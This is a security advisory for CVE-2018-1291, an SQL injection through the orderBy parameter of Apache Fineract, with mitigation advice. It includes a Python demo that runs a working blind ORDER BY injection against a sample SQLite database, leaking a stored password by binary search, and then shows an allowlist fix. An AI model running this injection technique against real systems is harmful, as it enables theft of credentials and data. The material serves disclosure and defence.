PT-2018-11467 · Apache · Apache Fineract

Published 2018-04-20 · Updated 2018-05-22 · CVE-2018-1291

CVSS v3.1: 8.1 (High)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Name of the Vulnerable Software and Affected Versions: Apache Fineract versions 0.4.0-incubating through 1.0.0
Description: The issue allows an authenticated attacker (the CVSS vector requires low privileges, PR:L) to inject SQL through the orderBy query parameter, whose value is concatenated directly into SQL statements instead of being checked against the set of sortable columns. An ORDER BY clause cannot be supplied as a bound parameter, so the injected expression runs with the privileges of the application's database account and can be used to read or update data that the endpoint was not meant to expose. The orderBy parameter is exposed through various REST endpoints used to query domain-specific entities.
Recommendations: For Apache Fineract versions 0.4.0-incubating through 1.0.0, as a temporary workaround, restrict access to the orderBy query parameter on the affected REST endpoints (for example, by rejecting or stripping it at a reverse proxy or web application firewall in front of the API) until a patched release can be deployed. Apply the same restriction to the companion sort-order parameter, since the ORDER BY direction is appended to the statement in the same way. A durable fix is to validate orderBy against an allowlist of sortable column names, and the sort order against ASC or DESC, before the value reaches the query builder; escaping or quoting does not help here because the value is used as an identifier, not as a string literal.
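The following added example (not code from Apache Fineract or from this advisory) shows, against an in-memory SQLite database with constructed sample data, why an orderBy value appended to the statement is exploitable even though the endpoint only returns a client list: a CASE expression inside ORDER BY flips the sort direction depending on a condition evaluated on another table, so row order becomes a boolean oracle that leaks the contents of that table one character at a time. The hardened form below it applies the allowlist check from the recommendations. The table and column names (m_client, m_appuser, display_name), the sample rows and the secret value are assumptions made for illustration and are not the real Fineract schema.

```python
import sqlite3

# Constructed stand-in for a stored credential; only its length and ASCII
# content matter for the demonstration (the oracle below assumes 7-bit chars).
SECRET_PASSWORD_HASH = "S3cret!"


def make_db():
    """Build the constructed demo schema: a listable client table and a
    separate user table the list endpoint is not meant to expose."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE m_client (id INTEGER PRIMARY KEY, display_name TEXT, office_id INTEGER);
        INSERT INTO m_client VALUES (1, 'Alice', 1), (2, 'Bob', 1), (3, 'Carol', 2);
        CREATE TABLE m_appuser (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
    """)
    db.execute("INSERT INTO m_appuser VALUES (1, 'mifos', ?)", (SECRET_PASSWORD_HASH,))
    return db


def list_clients_vulnerable(db, order_by):
    """Mirrors the flawed pattern: the caller-supplied orderBy is concatenated
    straight into the SQL text, exactly where a bind parameter cannot be used."""
    sql = "SELECT id, display_name FROM m_client ORDER BY " + order_by
    return [row[1] for row in db.execute(sql)]


def _oracle(db, position, threshold):
    """True iff the code point of secret[position] is greater than threshold.
    When the condition holds the rows sort by id (Alice first); otherwise they
    sort by -id (Carol first), so the first returned name answers the question."""
    payload = (
        "(CASE WHEN (SELECT unicode(substr(password, {}, 1)) FROM m_appuser WHERE id = 1)"
        " > {} THEN id ELSE -id END)".format(position, threshold)
    )
    return list_clients_vulnerable(db, payload)[0] == "Alice"


def leak_secret(db, max_len=64):
    """Recover m_appuser.password through the ORDER BY oracle, one character
    per binary search over the 7-bit code point range."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if _oracle(db, pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # Past the end of the string substr() is empty and unicode() is
            # NULL, so the comparison is never true and the search bottoms out.
            break
        out += chr(lo)
    return out


# Hardened form: ORDER BY pieces are identifiers, so they are allowlisted
# rather than escaped. The column set is an assumption for the demo table.
ALLOWED_ORDER_COLUMNS = frozenset({"id", "display_name", "office_id"})
ALLOWED_DIRECTIONS = frozenset({"ASC", "DESC"})


def is_valid_order(order_by, direction="ASC"):
    """Accept only a known sortable column and a known direction."""
    return order_by in ALLOWED_ORDER_COLUMNS and direction.upper() in ALLOWED_DIRECTIONS


def list_clients_hardened(db, order_by, direction="ASC"):
    """Same query, but the orderBy/sortOrder values are validated first."""
    if not is_valid_order(order_by, direction):
        raise ValueError("unsupported orderBy/sortOrder value")
    sql = "SELECT id, display_name FROM m_client ORDER BY {} {}".format(
        order_by, direction.upper())
    return [row[1] for row in db.execute(sql)]


if __name__ == "__main__":
    db = make_db()
    print("legitimate use:", list_clients_vulnerable(db, "display_name DESC"))
    print("leaked via orderBy:", leak_secret(db))
    print("hardened:", list_clients_hardened(db, "display_name", "desc"))
```

The leak works without any error message or stacked statement: each request is a syntactically valid list query, and only the position of one known row in the response changes, which is why blocking the parameter at the edge (or allowlisting it server-side) is the right control rather than relying on the database driver to reject "suspicious" input.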

Fix

SQL injection


Weakness Enumeration

Related Identifiers: CVE-2018-1291

Affected Products: Apache Fineract